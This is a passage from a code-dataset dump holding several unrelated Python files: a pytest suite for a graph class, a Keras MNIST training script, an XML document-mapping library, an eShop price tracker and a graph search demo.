= chain(*(_make_node_edge_combos(nodes) for nodes in TEST_CASES))\n\n\n# POP = (True, False)\n\n# TEST_CASES = product(TEST_CASES, POP)\n\n\n@pytest.fixture(scope='function', params=TEST_CASES)\ndef new_graph(request):\n \"\"\"Return a new empty instance of MyQueue.\"\"\"\n nodes, edges = request.param\n\n instance = ClassDef()\n for node in nodes:\n instance.add_node(node)\n\n for edge in edges:\n instance.add_edge(*edge)\n\n try:\n node_to_delete = random.choice(list(nodes))\n except IndexError:\n node_to_delete = None\n\n try:\n edge_to_delete = random.choice(list(edges))\n except IndexError:\n edge_to_delete = None\n\n not_edges = set(permutations(nodes, 2)) - edges\n\n return GraphFixture(\n instance,\n nodes,\n edges,\n node_to_delete,\n edge_to_delete,\n not_edges,\n )\n\n\n@pytest.mark.parametrize('method', REQ_METHODS)\ndef test_has_method(method):\n \"\"\"Test that graph has all the correct methods.\"\"\"\n from graph import Graph\n assert hasattr(ClassDef(), method)\n\n\ndef test_nodes_unique(new_graph):\n \"\"\"Test that all graph's nodes are unique.\"\"\"\n nodes = new_graph.instance.nodes()\n assert len(nodes) == len(set(nodes))\n\n\ndef test_nodes(new_graph):\n \"\"\"Test that graph has all the inserted nodes.\"\"\"\n assert set(new_graph.instance.nodes()) == new_graph.nodes\n\n\ndef test_has_node(new_graph):\n \"\"\"Test that graph has all the inserted nodes.\"\"\"\n assert all([new_graph.instance.has_node(n) for n in new_graph.nodes])\n\n\ndef test_edges(new_graph):\n \"\"\"Test that graph has all the correct edges.\"\"\"\n assert set(new_graph.instance.edges()) == new_graph.edges\n\n\ndef test_neighbors_error(new_graph):\n \"\"\"Test that neighbors raises an error when given node is not in graph.\"\"\"\n val = 'nodenotingraph'\n with pytest.raises(ValueError):\n new_graph.instance.neighbors(val)\n\n\ndef test_add_new_node_no_neighbors(new_graph):\n \"\"\"Test new node added without edges is in the graph without neighbors.\"\"\"\n val = 'newnodenoneighbors'\n new_graph.instance.add_node(val)\n assert not set(new_graph.instance.neighbors(val))\n\n\ndef test_add_new_node_no_edges(new_graph):\n \"\"\"Test new node added without edges is not neighbor of any other node.\"\"\"\n val = 'newnodenoedges'\n new_graph.instance.add_node(val)\n other_neighbors = chain(*(new_graph.instance.neighbors(n)\n for n in new_graph.instance.nodes()))\n assert val not in set(other_neighbors)\n\n\ndef test_add_edge(new_graph):\n \"\"\"Check new edge is added by add_edge when not already in graph.\"\"\"\n new_nodes = ('notingraph1', 'notingraph2')\n assert new_nodes not in new_graph.instance.edges()\n new_graph.instance.add_edge(*new_nodes)\n assert new_nodes in new_graph.instance.edges()\n\n\ndef test_add_edge_adds_nodes(new_graph):\n \"\"\"Check new nodes are added by add_edge when not already in graph.\"\"\"\n new_nodes = {'notingraph1', 'notingraph2'}\n assert not new_nodes.issubset(new_graph.instance.nodes())\n new_graph.instance.add_edge(*new_nodes)\n assert new_nodes.issubset(new_graph.instance.nodes())\n\n\ndef test_del_node(new_graph):\n \"\"\"Test that a node is no longer in the graph after deletion.\"\"\"\n if new_graph.node_to_delete is None:\n pytest.skip()\n new_graph.instance.del_node(new_graph.node_to_delete)\n assert new_graph.node_to_delete not in new_graph.instance.nodes()\n\n\ndef test_del_node_neighbors(new_graph):\n \"\"\"Test deleted node is not a neighbor any other nodes.\"\"\"\n if new_graph.node_to_delete is None:\n pytest.skip()\n new_graph.instance.del_node(new_graph.node_to_delete)\n other_neighbors = chain(*(new_graph.instance.neighbors(n)\n for n in new_graph.instance.nodes()))\n assert new_graph.node_to_delete not in set(other_neighbors)\n\n\ndef test_del_node_error(new_graph):\n \"\"\"Test that del_node raises an error when node is not in graph.\"\"\"\n val = 'nodenotingraphtodelete'\n with pytest.raises(ValueError):\n new_graph.instance.del_node(val)\n\n\ndef test_del_edge(new_graph):\n \"\"\"Test that an edge is no longer in the graph after deletion.\"\"\"\n if new_graph.edge_to_delete is None:\n pytest.skip()\n new_graph.instance.del_edge(*new_graph.edge_to_delete)\n assert new_graph.edge_to_delete not in new_graph.instance.edges()\n\n\ndef test_del_edge_neighbors(new_graph):\n \"\"\"Test that del_edge removes second node from neighbors of first node.\"\"\"\n if new_graph.edge_to_delete is None:\n pytest.skip()\n node1, node2 = new_graph.edge_to_delete\n new_graph.instance.del_edge(*new_graph.edge_to_delete)\n assert node2 not in new_graph.instance.neighbors(node1)\n\n\ndef test_del_edge_adjacent(new_graph):\n \"\"\"Test that adjacent is false afer edge has been deleted.\"\"\"\n if new_graph.edge_to_delete is None:\n pytest.skip()\n new_graph.instance.del_edge(*new_graph.edge_to_delete)\n assert not new_graph.instance.adjacent(*new_graph.edge_to_delete)\n\n\ndef test_del_edge_error(new_graph):\n \"\"\"Test that del_edge raises an error when node is not in graph.\"\"\"\n edge = ('nodenotingraphtodelete1', 'nodenotingraphtodelete1')\n with pytest.raises(ValueError):\n new_graph.instance.del_edge(*edge)\n\n\ndef test_adjacent(new_graph):\n \"\"\"Test that adjacent returns expected values for connected edges.\"\"\"\n assert all([new_graph.instance.adjacent(*edge)\n for edge in new_graph.edges])\n\n\ndef test_adjacent_false(new_graph):\n \"\"\"Test that all edges that doesn't exist are false by adjacency.\"\"\"\n if not new_graph.not_edges:\n pytest.skip()\n assert not any([new_graph.instance.adjacent(*edge)\n for edge in new_graph.not_edges])\n\n\ndef test_adjacent_error(new_graph):\n \"\"\"Test adjacent raises error when both given nodes are not in graph.\"\"\"\n val = 'totallynotingraph'\n with pytest.raises(ValueError):\n new_graph.instance.adjacent(val, val)\n\n\ndef test_adjacent_error2(new_graph):\n \"\"\"Test adjacent raises error when first node not in graph.\"\"\"\n if new_graph.node_to_delete is None:\n pytest.skip()\n val = 'totallynotingraph'\n with pytest.raises(ValueError):\n new_graph.instance.adjacent(val, new_graph.node_to_delete)\n\n\ndef test_adjacent_error3(new_graph):\n \"\"\"Test adjacent raises error when second node not in graph.\"\"\"\n if new_graph.node_to_delete is None:\n pytest.skip()\n val = 'totallynotingraph'\n with pytest.raises(ValueError):\n new_graph.instance.adjacent(new_graph.node_to_delete, val)\n","sub_path":"standard-tests/test_graph_standard.py","file_name":"test_graph_standard.py","file_ext":"py","file_size_in_byte":8408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"11838547","text":"from keras import backend as K\nfrom keras.datasets import mnist\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom model_const_hw import Network\nimport time\nimport tensorflow as tf\nimport keras\n\ndef replace_no(labels):\n # even number -> 0, odd number -> 1\n labels[labels%2 == 0] = 0\n labels[labels%2 == 1] = 1 \n return labels\n\ndef replace_5(labels):\n # number < 5 -> 0, number >= 5 -> 1\n labels[labels < 5] = 0\n labels[labels >= 5] = 1 \n return labels\n\ndef plot_epochs(hisotry):\n\n epochs = range(len(history.history['loss']))\n plt.figure()\n plt.xlabel('epochs')\n plt.ylabel('mean squared error')\n plt.plot( epochs , history.history['val_loss'] ,label = 'val_loss')\n plt.plot( epochs , history.history['loss'] ,label = 'train_loss')\n plt.ylim([0,0.15])\n plt.grid(which='major',color='black',linestyle='-')\n #plt.grid(which='minor',color='red',linestyle='-')\n plt.legend()\n plt.savefig('epoch_eo_class_5.png')\n #plt.show()\n\nif __name__ == \"__main__\":\n\n start = time.time()\n (train_images, train_labels), (test_images, test_labels) = np.array(mnist.load_data())\n train_labels = replace_5(train_labels)\n test_labels = replace_5(test_labels)\n train_images = train_images.reshape(train_images.shape[0], train_images.shape[1], train_images.shape[2],1)\n test_images = test_images.reshape(test_images.shape[0], test_images.shape[1], test_images.shape[2],1)\n #train_images = train_images.astype('float32')\n #test_images = test_images.astype('float32')\n #train_images /= 255\n #test_images /= 255\n \n train_labels = keras.utils.to_categorical(train_labels,2)\n test_labels = keras.utils.to_categorical(test_labels, 2)\n \n K.set_image_data_format(\"channels_last\")\n EPOCHS = 1\n channels = 1\n BATCH = 50\n \n #get_model\n height = train_images.shape[1]\n width = train_images.shape[2]\n model_ins = Network(channels,width,height)\n network = model_ins.get_model()\n \n #optimizer = tf.train.RMSPropOptimizer(0.000001)\n optimizer = tf.train.AdamOptimizer(0.00005)\n \n network.compile(loss=\"binary_crossentropy\", \n optimizer=optimizer, \n metrics=[\"acc\"])\n \n history = network.fit(train_images,\n train_labels, \n epochs = EPOCHS, \n verbose = 1,\n batch_size = BATCH,\n validation_data = (test_images, test_labels)\n )\n\n network.save('ts_5.h5' , include_optimizer = False)\n plot_epochs(history)\n\n pred = network.predict(test_images[:10])\n pred[pred < 0.5] = 0\n pred[pred > 0.5] = 1\n\n test_images = test_images.reshape(test_images.shape[0], test_images.shape[1], test_images.shape[2])\n for i,img in enumerate(test_images[:10]):\n plt.figure()\n plt.title(pred[i,0])\n plt.imshow(img,cmap = 'gray')\n plt.savefig('5_images/' + str(i) + '.jpg')\n plt.close()\n \n end = time.time()\n print(\"time : {}[m]\".format((end - start)/60))\n \n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"330168154","text":"#! /usr/bin/env python\n\nfrom __future__ import absolute_import\n\nfrom lxml import etree\nimport inspect\nimport logging\nimport re\nimport sys\n\nlogger = logging.getLogger('cwt.wps_lib.xml')\n\nSUPPORTED_CONVERSION = (str, float, bool, int, long)\n\nclass XMLError(Exception):\n pass\n\nclass Translator(object):\n \"\"\" Base translator class.\n\n This class can be use to control how property names are transformed\n to xml element/attribute names and vica-versa.\n \"\"\"\n def property_to_element(self, name):\n raise NotImplmenetedError()\n\n def property_to_attribute(self, name):\n raise NotImplmenetedError()\n\n def element_to_property(self, name):\n raise NotImplmenetedError()\n\n def element_to_attribute(self, name):\n raise NotImplmenetedError()\n\nclass Attribute(object):\n \"\"\" Attribute decorator.\n\n This decorator represents an xml attribute. If attach is not specified then\n the attribute will be created on the root element.\n\n Attributes:\n namespace: A str namespace identifier.\n value_type: A type that the attribute will hold. Default: str\n required: A bool flag denoting whether the attribute is required. Default: False\n attach: A str name of the element to set the attribute on.\n \"\"\"\n def __init__(self, **kwargs):\n self.namespace = kwargs.get('namespace')\n self.value_type = kwargs.get('value_type', str)\n self.required = kwargs.get('required', False)\n self.attach = kwargs.get('attach')\n\n def __call__(self, f):\n f.metadata = self\n\n return f\n\n def __str__(self):\n return ', '.join('%s=%s' % (x, y) for x, y in self.__dict__.iteritems())\n\nclass Element(object):\n \"\"\" Element decorator.\n\n This decorator represents an xml element.\n\n Examples of options.\n\n @Element(namespace='ns')\n def test(self): pass\n\n \n\n @Element(output_list=True)\n def test(self): pass\n\n 1\n 2\n\n @Element(child_tag='item', child_namespace='ns')\n def test(self): pass\n\n \n 1\n \n\n @Element(attr='value')\n def test(self): pass\n\n \n\n @Element(path='/hello/once/only', nsmap={'once': 'ns'})\n def test(self): pass\n\n \n \n \n 1\n \n \n \n\n # NOTE: if store_value is present it will be the only property used\n class Test(xml.XMLDocument):\n @Element(store_value=True)\n def test(self): pass\n\n 1\n\n Attributes:\n namespace: A str namesapce identifier.\n output_list: A bool flag denoting wether the element has multiple children. Default: False\n child_tag: A str value to create an element to wrap the value in.\n child_namespace: A str namespace identifier for child_tag.\n attr: A str value to name the attribute to hold the value.\n path: A str path to nest the element under.\n nsmap: A dict namespace map for the path.\n value_type: A type that the element will hold. Default: str\n store_value: A bool flag denoting that the elements contents will be the value.\n minimum: An int setting the minimum number of items.\n maximum: An int setting the maximum number of items.\n \"\"\"\n def __init__(self, **kwargs):\n self.namespace = kwargs.get('namespace')\n self.output_list = kwargs.get('output_list', False)\n self.child_tag = kwargs.get('child_tag')\n self.child_namespace = kwargs.get('child_namespace')\n self.combine = kwargs.get('combine', False)\n self.attr = kwargs.get('attr')\n self.path = kwargs.get('path')\n self.nsmap = kwargs.get('nsmap')\n self.value_type = kwargs.get('value_type', str)\n self.store_value = kwargs.get('store_value', False)\n self.minimum = kwargs.get('minimum', 1)\n self.maximum = kwargs.get('maximum')\n\n def __call__(self, f):\n f.metadata = self\n\n return f\n\n def __str__(self):\n return ', '.join('%s=%s' % (x, y) for x, y in self.__dict__.iteritems())\n\nclass XMLDocumentMarkupType(type):\n \"\"\" XMLDocumentMarkupType.\n\n This type must be used with XMLDocument class to create xml documents. \n This metaclass will collected the elements and attribute from properties\n and attach them to the class.\n \"\"\"\n def __new__(mcs, name, bases, dct):\n def fget(key):\n def fget_wrapper(self):\n return getattr(self, '__%s' % (key,), None)\n\n return fget_wrapper\n\n def fset(key):\n def fset_wrapper(self, value):\n setattr(self, '__%s' % (key,), value)\n\n return fset_wrapper\n\n attributes = {}\n elements = {}\n store_value = None\n\n for key, value in dct.iteritems():\n if hasattr(value, 'metadata'):\n metadata = value.metadata\n\n if isinstance(metadata, Element):\n if metadata.store_value and store_value is None:\n store_value = key\n \n elements[key] = metadata\n else:\n attributes[key] = metadata\n\n dct[key] = property(fget(key), fset(key))\n\n cls = super(XMLDocumentMarkupType, mcs).__new__(mcs, name, bases, dct)\n\n # Set default values for the properties\n for key, value in dct.iteritems():\n if hasattr(value, 'metadata'):\n metadata = value.metadata\n\n if metadata.output_list:\n setattr(cls, key, [])\n else:\n setattr(cls, key, None)\n\n cls.attributes = attributes\n cls.elements = elements\n cls.store_value = store_value\n\n return cls\n\n# Error definitions\nclass XMLParseError(Exception):\n pass\n\nclass ValueConversionError(Exception):\n pass\n\nclass MissingNamespaceError(Exception):\n pass\n\nclass MismatchedTypeError(Exception):\n pass\n\nclass ValidationError(Exception):\n pass\n\nclass XMLDocument(object):\n \"\"\" XMLDocument class.\n \n This class must be inherited by as subclass. This works in conjunction with\n XMLDocumentMarkupType. Element and attribute decorators can be added to \n method definitions to create a pseudo XML schema.\n\n class Car(XMLDocument):\n __metaclass__ = XMLDocumentMarkupType\n\n def __init__(self, **kwargs):\n super(Car, self).__init__(**kwargs)\n\n @Attribute()\n def color(self): pass\n\n @Element()\n def engine(self): pass\n\n c = Car(color='blue', engine='V8')\n\n print c.xml()\n\n \n V8\n \n\n Attributes:\n namespace: A str namespace identifier for the root element.\n nsmap: A dict mapping namespace identifiers to namespace urls.\n tag: A str value to be substituted for the class name as the root element name.\n translatpor: A Translator to be use in converting names.\n **kwargs: A dict of default property values.\n \"\"\"\n def __init__(self, namespace=None, nsmap=None, tag=None, translator=None, **kwargs):\n self.namespace = namespace\n self.nsmap = nsmap\n self.tag = tag\n self.translator = translator\n\n for key, value in kwargs.iteritems():\n if hasattr(self, key):\n setattr(self, key, value)\n\n @classmethod\n def from_xml(cls, data):\n doc = cls()\n\n try:\n tree = etree.fromstring(data)\n except Exception:\n raise XMLError('Failed to parse xml')\n\n doc.parse_xml(tree)\n\n return doc\n\n @classmethod\n def from_element(cls, element, translator):\n doc = cls()\n\n doc.translator = translator\n\n doc.parse_xml(element)\n\n return doc\n\n def validate(self):\n \"\"\" Validates the property values against their definitions.\n\n Elements bounds are validated as well as attribute requirements.\n\n Raise:\n ValidationError: An error occurred validating one of the properties.\n \"\"\"\n for name, metadata in self.attributes.iteritems():\n if metadata.required:\n value = getattr(self, name)\n\n if value is None:\n raise ValidationError('%s Attribute %s is required' %\n (self.__class__.__name__, name,))\n\n for name, metadata in self.elements.iteritems():\n # Check property that stores a list\n if metadata.output_list:\n value = getattr(self, name)\n\n # Check the minimum\n if metadata.minimum > 0:\n if not isinstance(value, (list, tuple)):\n raise ValidationError('%s Element %s was expecting a '\n 'list or tuple of values' % (self.__class__.__name__, name,))\n elif value is None or len(value) < metadata.minimum:\n raise ValidationError('%s Element %s requires a minimum '\n 'of %s values' % (self.__class__.__name__, name, metadata.minimum))\n\n # Check the maximum\n if metadata.maximum is not None:\n if len(value) > metadata.maximum:\n raise ValidationError('%s Element %s requires max %s'\n ' values, %s were provided' %\n (self.__class__.__name__, name, metadata.maximum, len(value)))\n else:\n # Check if a single value is required\n if metadata.minimum > 0:\n value = getattr(self, name)\n\n if value is None:\n raise ValidationError('%s Element %s requires atleast '\n 'one value' % (self.__class__.__name__, name,))\n elif isinstance(value, (list, tuple)):\n raise ValidationError('%s Element %s was expecting a '\n 'single value' % (self.__class__.__name__, name,))\n\n def __append_value(self, name, node, metadata):\n \"\"\" Appends a value to a property that stores a list.\n \n Args:\n name: A str name of the property.\n node: A etree.Element whose value will be converted and stored.\n metadata: A Element/Attribute of the property being stored.\n \"\"\"\n # Check for an existing list or create a new one\n values = getattr(self, name)\n\n if values is None:\n values = []\n\n # Convert etree.Element to XMLDocument\n if issubclass(metadata.value_type, XMLDocument):\n value = metadata.value_type.from_element(node, self.translator)\n else:\n try:\n value = metadata.value_type(node.text)\n except ValueError:\n raise ValueConversionError('Could not convert from %s to %s' %\n (value.__class__, metadata.value_type.__class__))\n\n values.append(value)\n\n setattr(self, name, values)\n\n def __store_value(self, raw_name, name, node, metadata):\n \"\"\" Stores a node in a property.\n\n Args:\n raw_name: A str unformatted name for the node.\n name: A str formatted name for the node.\n node: A etree.Element whose value will be store.\n metadata: An Element/Attribute associatd with the property.\n \"\"\"\n logger.debug('Storing value \"%s\", \"%s\", \"%s\"', name, node.tag, metadata)\n\n # Process a list or single value\n if metadata.output_list:\n self.__append_value(name, node, metadata)\n else:\n # Check if a variable typed value is being stored.\n if isinstance(metadata.value_type, (list, tuple)):\n try:\n target = [x for x in metadata.value_type if x.__name__ == raw_name][0]\n except IndexError:\n raise XMLParseError('Failed to find value_type for {0}'.format(raw_name))\n\n value = target.from_element(node, self.translator)\n elif issubclass(metadata.value_type, XMLDocument):\n value = metadata.value_type.from_element(node, self.translator)\n else:\n value = metadata.value_type(node.text)\n\n setattr(self, name, value)\n\n def __match_parent(self, node):\n \"\"\" Processes up the XML tree to find a parent who is a known property.\n\n Args:\n node: A etree.Element that is the starting node.\n\n Return:\n A tuple containing the etree.Element and Element of the parent.\n \"\"\"\n parent = node\n parent_element = None\n parent_metadata = None\n\n while True:\n parent = parent.getparent()\n\n if parent is None:\n break\n\n if parent.tag in self.elements:\n metadata = self.elements[parent.tag]\n\n if (metadata.child_tag is not None and\n metadata.child_tag == node.tag):\n parent_element = parent\n \n parent_metadata = metadata\n\n break\n\n return parent_element, parent_metadata\n\n def __set_property(self, name, value, metadata):\n \"\"\" Converts and stores a value in a property.\n\n Args:\n name: A str name of the property.\n value: A str value to be stored.\n metadata: An Element/Attribute that belongs to the property.\n \"\"\"\n try:\n value = metadata.value_type(value)\n except ValueError:\n raise ValueConversionError('Could not convert from %s to %s' %\n (value.__class__, metadata.value_type.__class__))\n\n setattr(self, name, value)\n\n def __match_element_value_type(self, tag):\n \"\"\" Find element by its value_type.\n\n Args:\n tag: A str name of the element name.\n\n Return:\n A tuple including the name of the property and its related metadata.\n \"\"\"\n for name, metadata in self.elements.iteritems():\n candidates = metadata.value_type\n\n if not isinstance(candidates, (list, tuple)):\n candidates = [candidates]\n\n for c in candidates:\n if c.__name__ == tag:\n return name, metadata\n\n return None, None\n\n def parse_xml(self, root):\n \"\"\" Parses an XML document according to the class definition.\n\n Args:\n root: An etree.Element being the root of the document.\n \"\"\"\n # Remove the namespace\n cls_name = re.sub('^{.*}', '', root.tag)\n\n # Validate that we're parsing the correct class\n if not (cls_name == self.__class__.__name__ or\n (self.tag is not None and cls_name == self.tag)):\n raise ValidationError('XML does not match class definition: {} {} {}'.format(cls_name, self.tag, self.__class__.__name__))\n\n logger.debug('%s BEGIN PARSING \"%s\" %s', '#'*6, re.sub('^{.*}', '', root.tag), '#'*6)\n logger.debug(etree.tostring(root, pretty_print=True))\n logger.debug('Translator %s', self.translator)\n logger.debug('Known elements %s', self.elements.keys())\n\n # Process all the root attributes\n for name, value in root.attrib.iteritems():\n name = re.sub('^{.*}', '', name)\n\n if self.translator is not None:\n name = self.translator.attribute_to_property(name)\n\n if name in self.attributes:\n metadata = self.attributes[name]\n\n self.__set_property(name, value, metadata)\n\n # Process the XML tree using depth first search\n stack = [root]\n\n while len(stack):\n node = stack.pop()\n\n tag = node.tag\n\n name = re.sub('^{.*}', '', tag)\n \n # Translate the name if needed\n if self.translator is not None:\n trans_name = self.translator.element_to_property(name)\n else:\n trans_name = name\n \n logger.debug('Processing element \"%s\" (%s)', trans_name, name)\n\n # On non-root nodes check for attributes and store their values.\n if node != root:\n for atrans_name, value in node.attrib.iteritems():\n if self.translator is not None:\n atrans_name = self.translator.attribute_to_property(atrans_name)\n\n if atrans_name in self.attributes:\n metadata = self.attributes[atrans_name]\n\n self.__set_property(atrans_name, value, metadata)\n\n # Check if the current node is defined in the class\n if trans_name in self.elements:\n metadata = self.elements[trans_name]\n\n logger.debug('Element \"%s\" is a known property %s', trans_name, metadata)\n\n # Process a property value that is stored as an attribute.\n if metadata.attr is not None:\n if metadata.attr in node.attrib:\n value = node.attrib[metadata.attr]\n\n self.__set_property(node.tag, value, metadata)\n elif (metadata.child_tag is not None or\n # Process child tags or multiple child tags\n (metadata.output_list and\n issubclass(metadata.value_type, XMLDocument) and\n metadata.path is not None) or\n isinstance(metadata.value_type, (list, tuple))):\n for c in node.getchildren():\n stack.append(c)\n else:\n self.__store_value(name, trans_name, node, metadata)\n else:\n # Node is not a known property we try to process it according\n # to the rules or we just add it's children to the stack.\n logger.debug('Handling unknown element \"%s\"', name)\n\n match_trans_name, match_metadata = self.__match_element_value_type(name)\n\n logger.debug('Match element by value_type \"%s\": \"%s\"', match_trans_name, match_metadata)\n\n # Search for a defined element whos value_type matches the nodes\n # name. This is a case where value_type may accept multiple types.\n if match_trans_name is not None:\n self.__store_value(name, match_trans_name, node, match_metadata)\n else:\n handled = False\n\n # Check to see if the an Element with store_value has been\n # defined, and the value of the node should be stored.\n for ename, emeta in self.elements.iteritems():\n if emeta.store_value:\n children = node.getchildren()\n\n # Special case where the stored value is XML\n if len(children) > 0:\n value = '\\n'.join(etree.tostring(x, pretty_print=True) for x in children)\n\n setattr(self, ename, value)\n else:\n setattr(self, ename, node.text)\n\n handled = True\n\n break\n\n if not handled:\n # Last resort, run up the tree searching for a parent\n # who can store the value\n parent_element, parent_metadata = self.__match_parent(node)\n\n if parent_element is not None:\n self.__store_value(name, parent_element.tag, node, parent_metadata)\n else:\n # End of the line just append the child nodes to the\n # stack\n for c in node.getchildren():\n stack.append(c)\n\n logger.debug('%s END PARSING \"%s\" %s', '#'*6, re.sub('^{.*}', '', root.tag), '#'*6)\n\n def __generate_name(self, name, namespace, metadata=None):\n \"\"\" Generate an Element/Attribute name.\n\n If a namespace is provided make sure it is present in the classes nsmap.\n\n Args:\n name: A str base name.\n namespace: A str namespace identifier.\n metadata: A Element/Attribute associated to the property\n\n Return:\n A str formatted Element/Attribute name\n\n Raises:\n MissingNamespaceError: The namespace is not present in the classes nsmap.\n \"\"\"\n new_name = name\n\n if metadata is not None and self.translator is not None:\n if isinstance(metadata, Element):\n new_name = self.translator.property_to_element(name)\n else:\n new_name = self.translator.property_to_attribute(name)\n\n if namespace is None:\n return new_name\n\n try:\n return '{%s}%s' % (self.nsmap[namespace], new_name)\n except TypeError:\n return new_name\n except KeyError:\n raise MissingNamespaceError('Namespace %s was not found in the namespace map' %\n (namespace,))\n\n def __generate_element(self, parent, name, value, metadata, cache):\n \"\"\" Creates a new element.\n \n Args:\n parent: An etree.Element that will be the parent of the new node.\n name: A str name of the new node.\n value: An object whos value will be stored.\n metadata: An Element/Attribute associated with the property.\n cache: A dict that will contain all the new nodes.\n\n Return:\n A new etree.Element.\n \"\"\"\n if value is None:\n return None\n\n if isinstance(value, XMLDocument):\n if self.translator is not None:\n value.translator = self.translator\n\n child_element = value.generate_xml()\n\n parent.append(child_element)\n else:\n new_name = self.__generate_name(name, metadata.namespace, metadata)\n\n new_element = etree.SubElement(parent, new_name)\n\n if metadata.attr is not None:\n new_element.set(metadata.attr, value)\n else:\n new_element.text = str(value)\n\n cache[name] = new_element\n\n def generate_xml(self):\n \"\"\" Generate XML from class definition.\n\n Process the classes elements and attributes that have been declard to\n create an XML document.\n\n \"\"\"\n # Validate all the document constraints\n self.validate()\n\n # Generate our root nodes name\n cls_name = self.__class__.__name__\n\n if self.tag is not None:\n cls_name = self.tag\n\n cls_name = self.__generate_name(cls_name, self.namespace)\n\n root = etree.Element(cls_name, nsmap=self.nsmap)\n\n cache = {}\n\n # Process all of the declared elements\n for name, metadata in self.elements.iteritems():\n parent = root\n\n # Contents of the root node will be only this value\n if metadata.store_value:\n value = getattr(self, name)\n\n root.text = value\n\n break\n\n # Create a path if declared\n if metadata.path is not None:\n for s in metadata.path.split('/'):\n if s != '':\n new_s = s\n\n if (metadata.nsmap is not None and\n s in metadata.nsmap):\n new_s = self.__generate_name(s, metadata.nsmap[s], metadata)\n\n parent = etree.SubElement(parent, new_s)\n\n cache[s] = parent\n\n if metadata.attr is not None:\n value = getattr(self, name)\n\n self.__generate_element(parent, name, value, metadata, cache)\n elif metadata.child_tag is not None:\n value = getattr(self, name)\n \n new_name = self.__generate_name(name, metadata.namespace, metadata)\n\n new_element = etree.SubElement(parent, new_name)\n\n cache[name] = new_element\n\n if not metadata.output_list:\n value = [value]\n \n if value is not None:\n for v in value:\n self.__generate_element(new_element, metadata.child_tag, v, metadata, cache)\n elif metadata.output_list:\n value = getattr(self, name)\n\n if value is not None:\n for v in value:\n self.__generate_element(parent, name, v, metadata, cache)\n else:\n value = getattr(self, name)\n\n self.__generate_element(parent, name, value, metadata, cache)\n\n # Process the attributes last since they may be attached to nodes\n # created by Elements that declared path values.\n for name, metadata in self.attributes.iteritems():\n value = getattr(self, name)\n\n if value is None:\n continue\n\n name = self.__generate_name(name, metadata.namespace, metadata)\n\n if metadata.attach is not None:\n if metadata.attach in cache:\n cache[metadata.attach].set(name, str(value))\n else:\n root.set(name, str(value))\n\n return root\n\n def xml(self, pretty_print=False):\n \"\"\" Generate str XML document from etree.Element. \"\"\"\n return etree.tostring(self.generate_xml(), pretty_print=True)\n","sub_path":"cwt/wps_lib/xml.py","file_name":"xml.py","file_ext":"py","file_size_in_byte":26059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"421458348","text":"from datetime import datetime\n\nfrom db import DbUtil\nfrom extractor import ListingExtractor\nfrom model import Game, Listing\nfrom currency import CurrencyConverter\n\n\nclass ListingTracker():\n\n def __init__(self, db_name):\n self.db_util = DbUtil(db_name)\n\n self.countries = self.db_util.list_countries()\n self.extractor = ListingExtractor()\n self.existing_games = self.db_util.list_games()\n self.date = datetime.today().date()\n\n def save_listings(self):\n self.update_currency_values()\n\n for country in self.countries:\n self.save_country_listings(country)\n\n def update_currency_values(self):\n\n currency_codes = self.db_util.list_currency_codes()\n converter = CurrencyConverter()\n\n for code in currency_codes:\n try:\n new_usd_rate = converter.get_conversion_rate(currency_code=code, base='USD')\n self.db_util.update_currency_usd_conversion_rate(code, new_usd_rate)\n except KeyError as missing_key:\n print(f\"Could not update conversion rate for currency {missing_key}\")\n\n def save_country_listings(self, country):\n\n print(f\"Extracting listings from: [{country.name}]\")\n country_new_listings = self.extractor.extract_listings(country.eshop_url)\n\n for new_listing in country_new_listings:\n self.save_country_listing(new_listing, country)\n\n def save_country_listing(self, new_listing, country):\n game = self.find_game_by_title(new_listing[\"game_title\"])\n\n new_listing_usd_value = self.calculate_usd_value(new_listing[\"price\"], country)\n\n if game:\n if game.last_updated != self.date or new_listing_usd_value < game.min_price:\n self.update_game_min_price(game, new_listing_usd_value, country)\n else:\n game = self.create_new_game(new_listing, new_listing_usd_value, country)\n\n listing = Listing(original_value=new_listing[\"price\"],\n usd_value=new_listing_usd_value,\n date=self.date,\n game_id=game,\n country_id=country)\n\n self.db_util.save(listing)\n\n def update_game_min_price(self, game, new_listing_usd_value, country):\n game.min_price = new_listing_usd_value\n game.min_price_country_id = country\n game.last_updated = self.date\n\n self.db_util.save(game)\n\n def calculate_usd_value(self, original_value, country):\n return original_value / country.currency_usd_conversion\n\n def create_new_game(self, listing, price, country):\n game = Game(title=listing[\"game_title\"],\n min_price=price,\n min_price_country_id=country,\n last_updated=self.date)\n\n game.id = self.db_util.save(game)\n self.existing_games.append(game)\n\n return game\n\n def find_game_by_title(self, game_title):\n for existing_game in self.existing_games:\n if existing_game.title == game_title:\n return existing_game\n\n return None\n","sub_path":"prices_manager/tracker.py","file_name":"tracker.py","file_ext":"py","file_size_in_byte":3119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"579222601","text":"from queue import Queue\n\nfrom graph import Graph\n\ng = Graph()\n\ng.edges = {\n 'A': ['B', 'C', 'G'],\n 'B': ['A', 'C', 'D'],\n 'C': ['A', 'B'],\n 'D': ['B', 'F', 'E'],\n 'E': ['D', 'F'],\n 'F': ['D', 'E'],\n 'G': ['A', 'H'],\n 'H': ['G'],\n}\n\n\ndef dfs(graph: Graph, source: str, target: str):\n \"\"\"\n Given a graph and a source node, find a target using Depth-first search\n\n Great for traversing directed acyclic graphs, and thus job scheduling.\n \"\"\"\n visited = [source]\n path = []\n steps = 1\n while visited:\n node = visited.pop()\n if node == target:\n print(f'Found {target} in {steps} steps')\n return\n if node in path:\n continue\n path.append(node)\n for neighbour in graph.neighbours(node):\n visited.append(neighbour)\n steps += 1\n\n\ndef bfs(graph: Graph, source: str, target: str):\n \"\"\"\n Given a graph and a source node, find a target using breadth-first search\n\n Also known a 'flood fill', this is good for searching out and finding paths,\n can be used in generating maps etc.\n \"\"\"\n frontier = Queue()\n frontier.put(source)\n visited = {source: True}\n steps = 1\n while not frontier.empty():\n current = frontier.get()\n if current == target:\n print(f'Found {target} in {steps} steps')\n break\n for next_item in graph.neighbours(current):\n if next_item not in visited:\n frontier.put(next_item)\n visited[next_item] = True\n steps += 1\n\ndfs(g, 'A', 'F')\nbfs(g, 'A', 